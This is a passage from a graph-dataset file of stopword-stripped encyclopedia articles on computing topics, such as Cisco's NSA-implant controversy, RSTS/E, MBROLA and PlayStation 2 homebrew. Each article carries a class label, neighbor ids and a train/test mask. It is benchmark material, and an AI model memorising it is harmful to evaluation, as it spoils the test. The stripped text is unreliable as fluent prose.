british-nigerian technology entrepreneur peter alfred-adekeye hacking pressured us government extradite canada cisco settled antitrust lawsuit two months alfred-adekeye arrest making software updates available multiven customers cisco linksys e2700 e3500 e4500 devices reported remotely updated firmware version forces users register cloud service allows cisco monitor network use ultimately shut cloud service account thus render affected router unusable according german magazine der spiegel nsa developed jetplow gaining access asa series 5505 5510 5520 5540 5550 500-series pix firewalls cisco chief security officer addressed allegations publicly denied working government weaken cisco products exploitation implement security back doors document included trove national security agency files released glenn greenwald book place hide details agency tailored access operations tao unit nsa employees intercept servers routers network gear shipped organizations targeted surveillance install covert firmware onto delivered trojan horse systems described nsa manager “ productive operations tao pre-position access points hard target networks around world. ” cisco denied allegations customer document saying information included specific cisco products supply chain intervention implant techniques new security vulnerabilities cisco general counsel also said cisco work government including united states government weaken products allegations reported prompted company ceo express concern president united states march 2014 cisco systems sued patent infringement spherix says 43 billion cisco sales infringe old nortel patents owned spherix officials spherix saying wide range cisco products switches routers infringe 11 former nortel patents company owns january 2008 cisco announced investment 10 million three years towards job creation technology sector development palestinian territories according cisco project cooperation palestinian authority president mahmoud abbas ramallah-based exalt technologies handles software development cisco outsources palestinian territories",
    "neighbors": [
      2049,
      7681,
      10242,
      9732,
      517,
      1541,
      8711,
      2057,
      6153,
      2060,
      7698,
      5141,
      8726,
      2071,
      9749,
      10265,
      1052,
      3614,
      7199,
      2080,
      8735,
      2085,
      550,
      11303,
      2601,
      6699,
      10283,
      2607,
      8752,
      9779,
      10297,
      5178,
      10302,
      10303,
      10307,
      10308,
      11333,
      6214,
      3657,
      1618,
      3673,
      4186,
      1115,
      7258,
      2654,
      8805,
      614,
      1638,
      4206,
      6773,
      10872,
      9341,
      127,
      2689,
      7809,
      131,
      2179,
      7299,
      9858,
      9863,
      7820,
      4242,
      10386,
      3732,
      156,
      1692,
      9375,
      8864,
      2721,
      8865,
      8355,
      2213,
      3751,
      3752,
      6823,
      3243,
      10417,
      6834,
      9906,
      4793,
      7865,
      704,
      7362,
      8899,
      3780,
      10950,
      9927,
      6344,
      5321,
      202,
      1738,
      5322,
      2765,
      8909,
      7887,
      9423,
      724,
      3286,
      8921,
      1242,
      1251,
      2275,
      9963,
      6382,
      3323,
      2300,
      5371,
      8700,
      5891,
      7946,
      8462,
      4374,
      793,
      5402,
      8989,
      6431,
      4896,
      6433,
      7967,
      9504,
      5924,
      1317,
      1318,
      2859,
      7983,
      4403,
      9523,
      5434,
      5440,
      9537,
      835,
      4421,
      841,
      1355,
      10574,
      6993,
      2904,
      8024,
      2907,
      2910,
      6495,
      5472,
      9055,
      9569,
      4964,
      357,
      1893,
      2405,
      11622,
      2409,
      4463,
      4464,
      7025,
      6514,
      1395,
      3955,
      7541,
      3447,
      1400,
      11646,
      9088,
      9607,
      10120,
      1417,
      7049,
      7563,
      8073,
      3981,
      6541,
      4495,
      8591,
      10637,
      5010,
      9117,
      3486,
      9630,
      5028,
      8614,
      8615,
      424,
      4011,
      7601,
      9137,
      2998,
      5559,
      10166,
      8121,
      3007,
      7103,
      9665,
      5069,
      10194,
      2003,
      10708,
      1493,
      982,
      2005,
      7638,
      11225,
      8668,
      1503,
      11233,
      1006,
      9713,
      2034,
      6643,
      4085,
      9206,
      9722,
      3580,
      3583
    ],
    "mask": "Test"
  },
  {
    "node_id": 6835,
    "label": 2,
    "text": "Sky_Force:sky force sky force vertically scrolling shoot 'em video game series created polish video game developer infinite dreams inc.. gameplay reminiscent capcom 19xx series seibu kaihatsu raiden series featuring weapon upgrade system large end stage bosses first title series originally released symbian pocket pc 2004 ported palm webos 2005 ios 2009 android 2010 first game series entirely sprite-based 2d game game received near perfect rating ign gave score 9.5 10 second outing initially released symbian pocket pc palm webos 2006 later released ios 2009 iphone ios 7 2010 psp 2011 psp version sky force reloaded simply named sky force 2d graphics style first title combined 3d polygon objects like destructible towers received remake mobile 2016 pc playstation 4 xbox one versions released 2017 also nintendo switch version released 2018 psp version game received metascore 69 100 metacritic based 6 reviews third part series released 2014 ios android free-to-play game third part series 2d graphics first two titles entirely replaced polygonal 3d graphics ios version game received favorable metascore 83 100 composed 8 reviews title windows version sky force 2014 released steam 2015 apple tv 4 2016 released playstation 3 playstation 4 playstation vita via playstation network summer 2016 version f2p improved upgrade system game received favorable review hardcore gamer gave score 4 5",
    "neighbors": [
      8937,
      4082,
      6797
    ],
    "mask": "Test"
  },
  {
    "node_id": 6836,
    "label": 8,
    "text": "Deferred_deep_linking:deferred deep linking deferred deep linking one aspect mobile deep linking describes principle deep linking app yet installed case deep linking deferred application installed user implies clicking otherwise invoking deep link causes common use case drive installs linking functionality not-yet-installed app provides user incentive install deferred deep linking allows mobile developers mobile marketers deliver seamlessly automated user experience whether app previously installed improving conversion rates user retention currently industry standard deferred deep linking various platform providers offer differing levels support platforms real support majority option roll-your-own approach general approach provide mechanism url parameters passed around app store ie received source linking application click stored passed destination linked-to application installed launched major technical challenge solve approach identifying click caused install correct url parameters passed newly-installed app tying clicks installs family technologies known attribution",
    "neighbors": [
      8413,
      6469
    ],
    "mask": "Test"
  },
  {
    "node_id": 6837,
    "label": 2,
    "text": "RSTS/E:rsts/e rsts multi-user time-sharing operating system initially developed evans griffiths hart boston acquired digital equipment corporation dec part hewlett packard pdp-11 series 16-bit minicomputers first version rsts rsts-11 version 1 implemented 1970 dec software engineers developed tss-8 time-sharing operating system pdp-8 last version rsts rsts/e version 10.1 released september 1992 rsts-11 rsts/e usually referred rsts article generally use shorter form kernel rsts programmed assembly language macro-11 compiled installed disk using cilus program running dos-11 operating system rsts booted extended version basic programming language dec called basic-plus system software cusps operating system including programs resource accounting login logout managing system written basic-plus 1970 1973 rsts ran 56k bytes magnetic core memory 64 kilobytes including memory-mapped i/o space would allow system 16 terminals maximum 17 jobs maximum program size 16k bytes end 1973 dec estimated 150 licensed systems running rsts 1973 memory management support included rsts rsts/e newer dec pdp-11/40 pdp-11/45 minicomputers pdp-11/20 supported rsts-11 introduction memory management newer pdp-11 computers meant machines able address four times amount memory 18-bit addressing 256k bytes also paved way developers separate user mode processes core kernel 1975 memory management support updated newer 22-bit addressable pdp-11/70 rsts systems could expanded use much two megabytes memory running 63 jobs rts ccl concepts introduced although compiled sysgen multi-terminal service introduced would allow single job ability control multiple terminals 128 total large-message send/receive interprocess communication became sophisticated efficient august 1,200 licensed systems 1977 installation process rsts longer dependent dos-11 rsts kernel could compiled rt-11 rts formatted kernel file rt-11 silus copied system disks computer time-sharing basic-plus rts well rt-11 rsx-11 teco third party rtss ran user mode processes independent rsts kernel systems manager could decide bootstrap phase rts run systems default kbm 3,100 licensed systems 1978 final memory management update included machines could support 22bit addressing rsts could use maximum amount memory available pdp-11 4 megabytes support also included supervisory mode made rsts first dec operating system capability decnet also supported well remote diagnostics field service technicians rdc colorado springs colorado dec subscription service end decade 5,000 licensed systems 1981 support separate instruction data space users unibus machines pdp-11/44 pdp-11/45 pdp-11/55 pdp-11/70 provided extension memory constraints individual program compiling programs use separate instruction data space would soon give program 64 kb instructions 64 kb buffering data dcl rts included well support newer revision decnet iii 1983 rsts/e v8.0-06 included support smallest 18-bit pdp-11 sold dec micropdp-11 pre-generated kernel cusps included distribution make installation micropdp-11 easier dec sold pre-generated version micropdp-11 microrsts reduced price however users needed purchase full version need generate kernel file system upgraded given designation rsts directory structure 1 rds1 previous versions rsts file system given designation rds0 newer file system designed support 1700 user accounts thought well 10,000 licensed users least equal number unlicensed users 1985 1989 rsts became mature product version 9 revisions dcl installed primary rts file system upgraded rds1.2 support new user account features passwords encrypted using modified des algorithm instead limited six 6 characters stored dec radix-50 format version 9 non-user system account project group zero designation 0,1 accounts project number 1 privileged unlike root account unix systems version 9 released additional accounts could created project zero multiple privileges could individually set account support lat protocol included well ability run newest version decnet iv network enhancements gave user connected terminal decserver ability communicate rsts machine easily could vax running vms dcl command structure dec operating systems also contributed familiar look feel another pseudo command file processor based vms features dcl command file processor fully supported integrated rsts extensive changes dcl monitor dcl executes command files part job therefore pseudo keyboard forcing commands keyboard necessary atpk 1994 dec sold pdp-11 software business mentec digital continued support pdp-11 customers short period assistance mentec staff issue ip rights digital later compaq later still hewlett packard straightforward much mis-information pervaded hobbyist user community digital mentec granted no-cost license anyone non-commercial hobby purpose use specific non-current versions several operating systems developed pdp-11 use specific pdp-11 emulator known simh emulators versions pdp software released use authorized disk images authorized operating systems may found internet along simh emulator ibm pc class computers thus possible hobbyist run rsts/e personal computer using software emulation fast faster originally ran real hardware standard complement documentation manuals accompanies rsts distribution consists least 11 large three-ring binders collectively known orange wall one small three-ring binder containing rsts/e quick reference guide paperback copy introduction basic aa-0155b-tk 11 three-ring binders contains volume 1 general information installation volume 2 system management volume 3 system usage volume 4 utilities volume 4a utilities volume 4b utilities volume 5 basic-plus volume 6 system programming volume 7 macro programming volume 7a macro programming volume 8 rms last software product description dec outlined following topics major features rsts/e version 10.1 rsts uses serial communication connection interact operator connection might local computer terminal 20 current loop interface rs-232 interface either local serial port remote connection via modem ethernet connection utilizing decnet lat many 128 terminals using multi-terminal service could connect rsts system running maximum 63 jobs depending processor used amount memory disk space system load rsts systems nowhere near many terminals users could also submit jobs run batch mode also batch program called atpk allowed users run series commands imaginary terminal pseudo-terminal semi-interactive mode similar batch commands ms-dos users connected system typing login command hello logged-out terminal pressing return actually typing command logged-out terminal simply started login program interpreted command one commands allowed used user yet logged logged associated program command chained otherwise message please say hello printed terminal prior version 9 user could also initiate 1 line login however left password screen anyone behind view examples follow one could determine status terminal command responses printed command interpreter logged-in user communicating basic-plus kbm given prompt ready user logged given prompt bye user would log supplying ppn number password user numbers consisted project number would equivalent group number unix comma programmer number numbers range 0 254 special exceptions specifying account project programmer number enclosed brackets typical user number could 10,5 project 10 programmer 5 2,146 254,31 200,220 etc user running system program logged system manager enabled ppn number 0,0 would appear systat cusp ** ** thus valid account number every project programmer number 0 usually reserved group account could referenced special symbol one user number 20,103 reference file name beginning would refer file stored account user number 20,0 feature would useful educational environments programmer number 0 could issued instructor class individuals students given accounts project number instructor could store account files marked shared project number would students class two special classes project numbers existed project number 0 generally reserved system software prior version 9 1 project 0 account named 0,1 programmers project number 1 privileged accounts equivalent single account root unix systems except account numbers 1,0 1,254 privileged accounts version 9 released account could granted specific privileges systems manager account 0,1 used store operating system file run-time library systems certain system files relating booting system author comments appear right bold dir command installed ccl equivalent run command direct program 0,1 account number directory name operating system storage account would referred project number 0 programmer number 1 numbers shown file represent size disk blocks block 512 bytes 1/2 kilobyte k c indicates file contiguous stored one file without separated pieces similar files microsoft windows system drive defragmented p indicates specially protected deleted even privileged user unless p bit cleared separate command numbers brackets like 40 represent protections file always displayed decimal protections indicate file may seen user users programmer number file read may altered another user whether file may executed ordimary user giving additional privileges protection codes similar r w x protections unix similar operating systems bsd linux code 60 equivalent private file code 63 private non-deletable file 40 public file library files kept account 1,1 usually referenced logical name lb account 1,2 system startup account much like unix system starting root contains system cusps could referenced prefixing cusp name dollar sign used account 1,3 1,4 1,5 account 1,1 also special privilege account user logged account permitted execute poke system call put values memory system thus account number 1,1 closest equivalent root unix-based systems one features rsts means execution programs environment used run various environments allowed programming basic-plus enhanced basic-plus-2 traditional programming languages cobol fortran environments separate one could start program one environment system would switch different environment running different program return user original environment started environments referred rts term command line interface rtss kbm prior version 9 systems manager needed define rts system would start one would execute compiled programs systems manager may also install special ccl commands take precedence kbm commands exception dcl ccl analogous shortcut program windows system symbolic link unix-based systems ccls installed memory-resident command either startup dynamically system running system manager i.e permanent like disk file logged user switch environments type language statements basic-plus programming language issue run commands specific programs issue special command called ccl execute program command options rsts systems managers generated kernel include control-t one line status option could tell program running rts program using much memory program taking much could expand much memory rts using programs written basic-plus ran basic rts allowed 32k bytes memory 64k total language interpreted different keyword internally converted unique byte code variables data indexed stored separately within memory space internal byte-code format known pcode interactive save command issued basic plus rts simply saved working memory area disk file .bac extension although format undocumented two electronic engineering undergraduates southampton university uk nick de smith david garrod developed decompiler could reverse engineer bac files original basic plus source complete original line numbers variable names subsequently worked dec rest memory used basic rts one wrote programs language permitted true binary executables basic-plus-2 fortran-iv macro assembler amount memory available would 56k 8k allocated rts standard basic-plus prompt ready response example starting version 9 dcl became primary startup rts even though ability execute binary programs became possible advent disappearing rsx rts see dcl incorporated recent versions dec operating systems rsx-11 rt-11 vms later openvms compatibility standard dcl prompt dollar sign example programs written rsx rts cobol macro assembler later releases basic-plus-2 could utilize maximum amount memory available binary program 56k due requirements rts needing top 8k use rsts version 7 later allowed rsx rts included kernel making completely disappear user address space thus allowing 64k bytes memory user programs programs got around limitations amount available memory using libraries permissible complicated overlay strategies calling programs chaining passing commands shared memory area called core common among practices rsx default kbm standard rsx prompt logged logged mcr monitor console routine sign example rt-11 rts emulated single job version rt-11 distribution like rsx emulation rt-11 occupied top 8k memory leaving bottom 56k cusps programs written fortran-iv macro assembler rt-11 default kbm standard rt-11 prompt logged logged sign example teco editor implemented rts maximize amount memory available editing buffer also first implemented rsts v5b release general purpose runtime systems rsx rt11 teco rts distributed rsts contain built-in kbm user would start teco like program running teco program teco.tec teco affine qedit direct ancestors first unix-based text editor ed rsts systems used ccl create file make filespec edit file teco filespec run teco program mung filespec data following program example teco could used calculate pi currently set 20 digits user typed unrecognised command system boot option prompt init.sys startup utility message type 'help help displayed user subsequently typed 'help including quotes prompt response amusing anyway ... followed actual help message one nice features system manager could compile kernel rotating display pattern gave illusion 2 snakes chasing around console lights normal kernel would give illusion 1 snake moving right left data lights across bottom system manager also compiled lights object module would see additional snake moving left right address lights across top accomplished using supervisory mode versions prior 9.0 rsx also similar display pattern would appear 2 snakes playing chicken would run center console command 'make allowed user make text file automatically enter teco text editor user typed 'make love system created file called 'love typed back 'not war kevin herbert later working dec added undocumented feature 90 allow user enter ^f see list open files user process complete blocks use file sizes beginning version 9.0 undocumented feature would allow system manager change display system date rsts became first operating system would display system date set numbers representing stardate commonly known tv series system industries bought source license rsts implement enhancement called simacs simultaneous machine access allowed special disk controller set semaphore flag disk access allowing multiple writes files rsts system disk shared multiple pdp-11 rsts systems feature implemented system industries controllers attached many dec computers designed dr. albert chu worked system industries required many changes way access disks accomplished rsts operating system fips file information processing system system handled i/o access single-threaded rsts allow disk access stall another machine active access block required fips could timeout request go next request 'come back stalled one round robin fashion code allow written philip hunt working system industries milipitas ca eventually worked digital equipment new england area late 1980s early '90s 1981 evans griffiths hart marketed ross/v product ross/v allowed user mode processes rsts cusps rtss user programs ability run unmodified vms vax-11 machines code emulation handled kernel processes would normally handled rsts kernel running pdp-11 original basic-plus language carried versions rsts subcontracted evans griffiths hart inc. fixed price 10,500 rsts applications run pdp-11 emulator information see pdp-11 rsts originally called btss name changed btss rtss product name btss marketed honeywell simple typing mistake changed name rtss rsts addition new memory management support ability install memory pdp-11/40 pdp-11/45 led another name change rsts-11 became rsts/e computer bureaus sometimes deployed user-11 rsts/e-based data management",
    "neighbors": [
      2560,
      2,
      6155,
      6675,
      7187,
      7188,
      10776,
      25,
      8732,
      4637,
      9759,
      9762,
      4643,
      6180,
      5158,
      7217,
      10803,
      9784,
      10809,
      576,
      2625,
      3650,
      8262,
      6221,
      10833,
      3160,
      10333,
      97,
      1121,
      11363,
      6760,
      10856,
      8298,
      9835,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      9887,
      8876,
      8879,
      3248,
      178,
      9907,
      6329,
      8889,
      5823,
      8388,
      1736,
      2248,
      9932,
      5328,
      5840,
      8402,
      2261,
      4309,
      7382,
      8410,
      9436,
      1247,
      11489,
      1253,
      7403,
      9452,
      10475,
      1776,
      242,
      5363,
      9466,
      2811,
      9468,
      1278,
      10499,
      1804,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      10016,
      292,
      10235,
      2345,
      7983,
      6448,
      2355,
      7477,
      823,
      4409,
      5435,
      6459,
      7483,
      7999,
      3904,
      11075,
      4423,
      5452,
      6988,
      7504,
      5457,
      11601,
      7507,
      11604,
      3413,
      7511,
      10590,
      2399,
      3426,
      9060,
      8551,
      5484,
      7020,
      11635,
      5492,
      2933,
      376,
      8573,
      10110,
      7039,
      8063,
      6529,
      10113,
      8069,
      394,
      3978,
      4492,
      7057,
      11667,
      5531,
      8092,
      11675,
      2462,
      5022,
      1952,
      7076,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      11184,
      7601,
      11187,
      10676,
      6075,
      6078,
      9151,
      11204,
      11205,
      4040,
      8136,
      2507,
      5067,
      9166,
      978,
      477,
      10730,
      10731,
      8687,
      3056,
      5105,
      6128,
      5619,
      5115
    ],
    "mask": "Test"
  },
  {
    "node_id": 6838,
    "label": 0,
    "text": "MBROLA:mbrola mbrola speech synthesis software worldwide collaborative project mbrola project web page provides diphone databases large number spoken languages mbrola software complete speech synthesis system languages text must first transformed phoneme prosodic information mbrola format separate software e.g espeakng necessary mbrola project started 1995 tcts lab faculté polytechnique de mons belgium scientific project obtain set speech synthesizers many languages possible first release mbrola software 1996 provided freeware non-commercial non-military application licenses created voice databases differ also mostly non-commercial non-military use due free usage non-commercial applications mbrola alternative choice private/home users de facto speech synthesis engine espeakng linux workstations mostly used commercial solutions e.g speaking time clocks boarding notifications ports terminals etc initial development voice databases updates support mbrola software ceased gradually closed-source binaries fell behind development recent hardware operating systems deal mbrola development team decided release mbrola open source software october 24 2018 source code released github gnu affero general public license january 23 2019 tool called mbrolator released provide creation mbrola database wav files license mbrola software uses mbrola multi-band resynthesis overlap add algorithm speech generation although diphone-based quality mbrola synthesis considered higher diphone synthesisers preprocesses diphones imposing constant pitch harmonic phases enhances concatenation slightly degrading segmental quality mbrola time-domain algorithm similar psola implies low computational load synthesis time unlike psola however mbrola require preliminary marking pitch periods feature made possible develop mbrola project around mbrola algorithm many speech research labs companies individuals around world provided diphone databases many languages voices notable omissions chinese",
    "neighbors": [
      4768,
      3874,
      3533,
      6797,
      7983,
      2901,
      214,
      823,
      11004,
      2045,
      2590
    ],
    "mask": "Test"
  },
  {
    "node_id": 6839,
    "label": 2,
    "text": "Kernel_virtual_address_space:kernel virtual address space kernel virtual address space kva virtual memory area linux kernel threads reside second part virtual address space occupied user virtual address space contain user threads",
    "neighbors": [
      823
    ],
    "mask": "Train"
  },
  {
    "node_id": 6840,
    "label": 9,
    "text": "LISP_2:lisp 2 lisp 2 programming language proposed 1960s successor lisp largely lisp-like semantics algol 60-like syntax today mostly remembered syntax fact many features beyond early lisps early lisps many limitations including limited data types slow numerics use fully parenthesized notation also considered problem inventor lisp john mccarthy expected issues addressed later version called notionally lisp 2 hence name lisp 1.5 successor earliest lisp lisp 2 joint project system development corporation information international inc. intended ibm built an/fsq-32 military computer development later shifted ibm 360/67 digital equipment corporation pdp-6 project eventually abandoned",
    "neighbors": [
      512,
      10752,
      11269,
      1159,
      6919,
      2062,
      9231,
      1552,
      791,
      8728,
      10012,
      3869,
      8226,
      5031,
      5803,
      6717,
      4799,
      5569,
      8262,
      11218,
      10712,
      3675,
      7392,
      11488,
      10083,
      6502,
      5361,
      8435,
      3446,
      5751,
      3323
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6841,
    "label": 0,
    "text": "Affix_grammar_over_a_finite_lattice:affix grammar finite lattice linguistics affix grammars finite lattice agfl formalism notation context-free grammars finite set-valued features acceptable linguists many different schools agfl-project aims development technology natural language processing available gnu gpl",
    "neighbors": [
      7780,
      2316
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6842,
    "label": 4,
    "text": "Benild_Joseph:benild joseph benild joseph born 15 may 1992 indian cyber security researcher tedx speaker white hat hacker currently president information systems security association issa india chapter advisory board member cybersecurity ventures featured book hacking hacker authored roger grimes silicon india magazine listed one top 8 ethical hackers india benild joseph born wayanad kerala studied infant jesus english medium school interest technology prompted mother send computer institute later learnt programming coding penchant towards technology led hacking working ebay tesco citigroup law enforcement agencies government organizations india helping dealing cyber threats safeguarding digital assets",
    "neighbors": [
      4689,
      7692,
      4830
    ],
    "mask": "Test"
  },
  {
    "node_id": 6843,
    "label": 6,
    "text": "Block_allocation_map:block allocation map computer file systems block allocation map data structure used track disk blocks considered use blocks may also referred allocation units clusters cp/m used block allocation map directory directory entry could list 8 16 blocks depending disk format allocated file file used blocks additional directory entries would needed thus single file could multiple directory entries benefit method possibility use sparse files declaring large file size allocating blocks actually used detriment method disk may free space unallocated blocks data appended file directory entries used commodore dos used similarly named significantly different block availability map",
    "neighbors": [
      7969,
      8129,
      9762,
      1801,
      4409,
      4764
    ],
    "mask": "Test"
  },
  {
    "node_id": 6844,
    "label": 1,
    "text": "ANSI-SPARC_Architecture:ansi-sparc architecture ansi-sparc architecture ansi-sparc stands american national standards institute standards planning requirements committee abstract design standard database management system dbms first proposed 1975 ansi-sparc model however never became formal standard mainstream dbms systems fully based tend exhibit full physical independence prevent direct user access conceptual level idea logical data independence widely adopted objectives three-level architecture separate user view three levels three level architecture aim enabling users access data personalised view distancing internal level external level means users need know data physically stored database level separation also allows database administrator dba change database storage structures without affecting users views three different types schema corresponding three levels ansi-sparc architecture overall description database called database schema",
    "neighbors": [
      1341
    ],
    "mask": "Test"
  },
  {
    "node_id": 6845,
    "label": 3,
    "text": "PlayStation_2_homebrew:playstation 2 homebrew homebrew playstation 2 refers independent development video games consumers playstation 2 video game console sony released linux-based operating system ps2 package also includes keyboard mouse ethernet adapter hdd currently sony online store states linux kit longer sale north america however july 2005 european version still available kit boots installing proprietary interface run-time environment region-coded dvd european north america kits work ps2 respective regions europe australia ps2 came free yabasic interpreter bundled demo disc time allows simple programs created ps2 end-user included failed attempt circumvent uk tax defining console computer contained certain software port netbsd project blackrhino gnu/linux alternative debian-based distribution also available ps2 using homebrew programs e.g 'sms media player possible listen various audio file formats mp3 oma ogg vorbis aac flac ac3 watch various video formats divx/xvid mpeg1 mpeg2 mpeg4-asp avi container using console media played device connected console i.e external usb/firewire/thumb drive/hard disk drive fat32 internal hard disk early revision consoles optical cd-r w /dvd±r w disks modded systems patched disks network shares windows network ps2 host protocol homebrew programs launched directly memory card unmodified consoles using certain software takes advantage long known used exploit dealing boot part ee/iop process independence recent development may 2008 called free mcboot allows homebrew programs launched without trigger disc required older exploit also allows use homebrew unmodded systems without functional disc drive however installation exploit individual memory card requires either already exploited/modded system order launch installer boot image load app loads elf files network adapter hard drive also required copying one memory card another work newer exploit work newest ps2s scph-9000x model bios 2.30 work models prior newest versions free mcboot version 1.90 newer also ability install boot sony non-sony hdds using fat ps2 network adapter support called free hdboot fhdb minor issues possible game entirely hdd without needing use optical disc drive physical memory card homebrew programs used play patched backups original ps2 dvd games unmodified consoles install retail discs installed hard drive older models esr hd loader hd advance open ps2 loader homebrew emulators older computer gaming systems developed ps2",
    "neighbors": [
      4136,
      10316,
      11287,
      823,
      10203,
      5215
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6846,
    "label": 2,
    "text": "Dave_Cutler:dave cutler david neil dave cutler sr. born march 13 1942 american software engineer designer developer several operating systems computer industry operating systems microsoft windows nt digital equipment corporation rsx-11m vaxeln vms openvms cutler born lansing michigan grew dewitt michigan graduating olivet college michigan 1965 went work dupont cutler holds least 20 patents affiliate professor computer science department university washington cutler avid auto racing driver competed atlantic championship 1996 2002 scoring career best 8th milwaukee mile 2000 cutler member adelphic alpha pi fraternity olivet college michigan cutler first exposure computers came tasked perform computer simulations model one dupont customers using ibm gpss-3 language ibm model 7044 work led interest computers operating systems worked cutler left dupont pursue interest computer systems beginning digital equipment corporation 1971 worked famous mill facility maynard massachusetts april 1975 digital began hardware project code-named star design 32-bit virtual address extension pdp-11 june 1975 cutler together dick hustvedt peter lipman appointed technical project leaders software project code-named starlet develop totally new operating system star family processors two projects tightly integrated beginning three technical leaders starlet project together three technical leaders star project formed blue ribbon committee digital produced fifth design evolution programs design featured simplifications memory management process scheduling schemes earlier proposals architecture accepted star starlet projects culminated development vax-11/780 superminicomputer vax/vms operating system respectively digital began working new cpu using risc design principles 1986 cutler working dec decwest facility bellevue washington selected head prism project develop company ’ risc machine operating system code named mica embody next generation design principles compatibility layer unix vms risc machine based ecl technology one three ecl projects digital undertaking time funding research development r costs multiple ecl projects yielding products would ultimately compete strain three ecl projects vax 9000 one directly commercialized primarily early successes pmax advanced development project need differing business models prism canceled 1988 favor pmax prism later surfaced basis digital alpha family computer systems cutler known disdain things unix sardonic nature showed vms versus unix debates digital early 1980s expressed low opinion unix process input/output model reciting get byte get byte get byte byte byte tune finale rossini william tell overture cutler left digital microsoft october 1988 led development windows nt later worked targeting windows nt digital 64-bit alpha architecture based prism design windows 2000 demise windows alpha demise digital instrumental porting windows amd new 64-bit amd64 architecture officially involved windows xp pro 64-bit windows server 2003 sp1 64-bit releases moved working microsoft live platform august 2006 dave cutler awarded prestigious status senior technical fellow microsoft 2008 professional developers conference microsoft announced azure services platform cloud-based operating system microsoft developing conference keynote cutler mentioned lead developer project along amitabh srivastava spokesperson microsoft confirmed cutler longer working windows azure joined xbox team information provided cutler role working within team may 2013 microsoft announced xbox one console cutler mentioned worked development host os portion system running inside new gaming device apparently work focused creating optimized version microsoft hyper-v host os specifically designed xbox one",
    "neighbors": [
      4194,
      3142,
      9759,
      6797,
      1935,
      7983,
      5873,
      8402,
      8976,
      5492,
      757,
      8502,
      10590,
      639
    ],
    "mask": "Test"
  },
  {
    "node_id": 6847,
    "label": 9,
    "text": "Maya_Embedded_Language:maya embedded language maya embedded language mel scripting language used simplify tasks autodesk 3d graphics software maya tasks achieved maya gui achieved mel well certain tasks available gui mel offers method speeding complicated repetitive tasks well allowing users redistribute specific set commands others may find useful mel syntactically similar perl tcl provides memory management dynamic array-allocation offers direct access functions specific maya majority standard maya commands default mel scripts saved maya program files directory mel fairly limited compared mainstream scripting languages mel primarily language meant journal maya session thus lacks many advanced features associative arrays python added maya alternative mel maya 8.5 still mel offers advantages python mel often criticized lack programming features object orientation practice however mel used metaprogramming language mel instructs maya node architecture solve problem since nodes form actual computational core maya using robust readily apparent programming method would inefficient approach many ways mel complements maya api somewhat clear boundaries allocated tasks makes mel harder learn fully understand tools designed using mel scripts generally come following categories example script copies selected object path maya also offers expression language super-set mel results nodes executed part maya dependency graph expressions developed maya expression editor allow scripts trigger maya evaluates scene file change time simulate complex behaviors perform useful tasks",
    "neighbors": [
      8582,
      8554,
      9780,
      692,
      6335
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6848,
    "label": 4,
    "text": "BPO_security:bpo security information security emerged significant concern banks mobile phone companies businesses use call centers business process outsourcing bpo instances theft personal data reported call centers britain financial services authority examined standards india april 2005 banking code standards board audited eight india-based call centres 2006 handling million calls per month uk examinations extend africa-based call centres staffed workers indian origin bcsb report stated customer data subject level security uk high risk complex processes subject higher levels scrutiny similar activities onshore india nasscom said take breach security extremely seriously assist police probe three identifiable types illicit activities concerning fraud emanating call centers items 1 2 mostly subject police action call centres use internal procedures minimise risk mitigation measures include limited",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 6849,
    "label": 9,
    "text": "AppleScript_Editor:applescript editor applescript editor formerly recently known script editor code editor applescript scripting language included classic mac os macos applescript editor provides basic debugging capabilities save applescripts plain text .applescript compiled script .scpt script bundle .scptd application .app applescript editor also handles script dictionary files allowing user see scripting classes commands available scriptable application installed computer prior mac os x 10.3 script editor developed using carbon 10.3 introduced new script editor written using cocoa applescript editor known script editor mac os x 10.6 also os x 10.10 renamed back script editor likely introduction javascript automation",
    "neighbors": [
      11521,
      2819,
      1796,
      3719,
      4615,
      10888,
      11402,
      9100,
      5647,
      10512,
      1042,
      8852,
      9109,
      1686,
      7318,
      4888,
      3228,
      11037,
      2207,
      1439,
      1699,
      811,
      3371,
      5292,
      1710,
      6700,
      7983,
      4657,
      1074,
      8877,
      10036,
      3766,
      2232,
      9529,
      9912,
      11257,
      9406,
      576,
      1729,
      4933,
      713,
      9418,
      9035,
      9802,
      6093,
      3790,
      7118,
      5713,
      1878,
      3670,
      4184,
      3289,
      9430,
      3035,
      4571,
      2141,
      4318,
      4702,
      4068,
      2149,
      5093,
      487,
      231,
      4457,
      9451,
      10221,
      8303,
      2288,
      5619,
      2676,
      6771,
      7928,
      8441,
      7163,
      7422,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 6850,
    "label": 1,
    "text": "IBM_Informix:ibm informix ibm informix product family within ibm information management division centered several relational database management system rdbms offerings informix products originally developed informix corporation whose informix software subsidiary acquired ibm 2001 april 2017 ibm hcl technologies products platforms division agreed long-term 15-year partnership co-develop support market product ibm continued active development marketing key informix products current version 12.10 forms basis several product editions variation capacity functionality informix database used many high transaction rate oltp applications retail finance energy utilities manufacturing transportation sectors recently server enhanced support data warehouse workloads informix server supports object-relational model permitted ibm offer extensions support data types part sql standard widely used time series spatial extensions provide data type support language extensions permit high performance domain specific queries efficient storage datasets based time series spatial data current version ibm informix 12.10 code-named centaurus development major enhancements made previous releases adding built-in index compression integration json collections support mongodb json drivers server enhancement permitting database objects partitioned across multiple servers cluster grid aka sharding queries optionally return data locally connected server instance entire grid sql heterogeneous clusters fully supported several deployment options available including provide high levels data redundancy fault tolerance feature marketed ibm informix flexible grid informix offered number editions including free developer editions editions small mid-sized business editions supporting complete feature set designed used support largest enterprise applications also advanced data warehouse edition informix version includes informix warehouse accelerator uses combination newer technologies including in-memory data tokenization deep compression columnar database technology provide extreme high performance business intelligence data warehouse style queries informix timeseries unique feature database system allows efficient fast manipulation time series data generated devices smart electric meters found financial trading systems time stamped stock 'ticks type data well suited storage use normal sql supported style data organization unique among ibm database products apple mac environment supported informix since version 11.7 ibm several database products capabilities overlap areas informix often compared ibm major database product db2 offered mainframe zseries platform well unix linux speculation ibm would combine informix db2 database products proven unfounded ibm instead continued expand variety database products 